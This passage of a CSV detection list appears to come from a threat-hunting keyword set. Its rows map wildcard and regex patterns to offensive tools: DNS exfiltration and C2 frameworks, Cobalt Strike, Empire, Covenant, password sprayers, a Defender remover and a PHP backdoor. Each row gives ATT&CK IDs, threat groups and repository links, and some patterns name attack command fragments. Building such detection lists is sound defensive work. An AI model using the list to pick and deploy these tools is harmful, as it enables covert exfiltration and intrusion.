This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41264" "*dnskire ALL=(ALL:ALL) NOPASSWD: ALL*",".{0,1000}dnskire\sALL\=\(ALL\:ALL\)\sNOPASSWD\:\sALL.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41265" "*dnskire may*(ALL : ALL) NOPASSWD: ALL**",".{0,1000}dnskire\smay.{0,1000}\(ALL\s\:\sALL\)\sNOPASSWD\:\sALL.{0,1000}.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41266" "*dnsKIRE started!\n*",".{0,1000}dnsKIRE\sstarted!\\n.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41267" "*dnskire-install*",".{0,1000}dnskire\-install.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","41268" "*DNSListener.py*",".{0,1000}DNSListener\.py.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and 
control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41269" "*dnslog--airvent.txt*",".{0,1000}dnslog\-\-airvent\.txt.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","N/A","10","10","28","13","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z","41270" "*dnslytics-get-rootdomains*",".{0,1000}dnslytics\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41271" "*dnsmastermind.rb*",".{0,1000}dnsmastermind\.rb.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","41272" "*dnsmorph*",".{0,1000}dnsmorph.{0,1000}","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. 
It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","N/A","3","266","43","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z","41273" "*dnspayload.bin*",".{0,1000}dnspayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","41274" "*DNS-Persist.git*",".{0,1000}DNS\-Persist\.git.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41275" "*dnspot-agent-cli-*",".{0,1000}dnspot\-agent\-cli\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41276" "*dnspot-server-cli-*",".{0,1000}dnspot\-server\-cli\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41277" "*dnspot-server-tui-*",".{0,1000}dnspot\-server\-tui\-.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","1","N/A","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","41278" "*dnsproxy start scripts*",".{0,1000}dnsproxy\sstart\sscripts.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense 
Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","41279" "*dnsrecon -*",".{0,1000}dnsrecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41280" "*dnsrecon*",".{0,1000}dnsrecon.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/darkoperator/dnsrecon","1","1","#linux","N/A","6","10","2755","556","2025-04-18T05:31:08Z","2010-12-16T03:25:49Z","41281" "*dnsrecon-zonetransfer*",".{0,1000}dnsrecon\-zonetransfer.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","41282" "*DnsSpoof.ps1*",".{0,1000}DnsSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","41283" "*DNSStager payloads Available*",".{0,1000}DNSStager\spayloads\sAvailable.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","41284" "*DNSStager will *",".{0,1000}DNSStager\swill\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","41285" "*dnsteal.git*",".{0,1000}dnsteal\.git.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41286" "*dnsteal.py*",".{0,1000}dnsteal\.py.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41287" 
"*dnsteal-master*",".{0,1000}dnsteal\-master.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","3","10","1694","231","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z","41288" "*dnstracer*",".{0,1000}dnstracer.{0,1000}","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z","41289" "*DNS-Tunnel-Keylogger*",".{0,1000}DNS\-Tunnel\-Keylogger.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","1","N/A","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","41290" "*dnstwist*",".{0,1000}dnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","41291" "*dnsx -silent -d * -w dns_worldlist.txt*",".{0,1000}dnsx\s\-silent\s\-d\s.{0,1000}\s\-w\sdns_worldlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41292" "*dnsx -silent -d domains.txt -w jira*grafana*jenkins*",".{0,1000}dnsx\s\-silent\s\-d\sdomains\.txt\s\-w\sjira.{0,1000}grafana.{0,1000}jenkins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41293" "*do PowerRun cmd.exe*smartscreen.dll*",".{0,1000}do\sPowerRun\scmd\.exe.{0,1000}smartscreen\.dll.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","41294" "*Do you want Ghauri set it for you ? 
[Y/n]*",".{0,1000}Do\syou\swant\sGhauri\sset\sit\sfor\syou\s\?\s\[Y\/n\].{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","41295" "*Do you want to launch the payload from x86 Powershell?*",".{0,1000}Do\syou\swant\sto\slaunch\sthe\spayload\sfrom\sx86\sPowershell\?.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","41296" "*Do you want to skip test payloads specific for other DBMSes?*",".{0,1000}Do\syou\swant\sto\sskip\stest\spayloads\sspecific\sfor\sother\sDBMSes\?.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","41297" "*do_attack(*",".{0,1000}do_attack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","41298" "*do_bypassuac*",".{0,1000}do_bypassuac.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","41299" "*do_metasploit(*",".{0,1000}do_metasploit\(.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41300" "*do_pyinject*",".{0,1000}do_pyinject.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","41301" "*do_socksoverrdp(*127.0.0.1*",".{0,1000}do_socksoverrdp\(.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41302" "*do_socksproxy(* listen_ip = '127.0.0.1'*",".{0,1000}do_socksproxy\(.{0,1000}\slisten_ip\s\=\s\'127\.0\.0\.1\'.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41303" "*do_startpscmd(*serverscript.ps1*",".{0,1000}do_startpscmd\(.{0,1000}serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended 
control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41304" "*Do-AltShiftEsc*",".{0,1000}Do\-AltShiftEsc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard 
Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41305" "*Do-AltShiftTab*",".{0,1000}Do\-AltShiftTab.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41306" "*doc/extras/HACKING.*",".{0,1000}doc\/extras\/HACKING\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","41307" "*docker * covenant*",".{0,1000}docker\s.{0,1000}\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41308" "*docker * --name elite *",".{0,1000}docker\s.{0,1000}\s\-\-name\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41309" "*docker * -t elite *",".{0,1000}docker\s.{0,1000}\s\-t\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","41310" "*docker build . -t spraycharles*",".{0,1000}docker\sbuild\s\.\s\-t\sspraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","41311" "*docker build . -t torat*",".{0,1000}docker\sbuild\s\.\s\-t\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","41312" "*docker build -t credmaster*",".{0,1000}docker\sbuild\s\-t\scredmaster.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","41313" "*docker build -t hiphp:latest*",".{0,1000}docker\sbuild\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
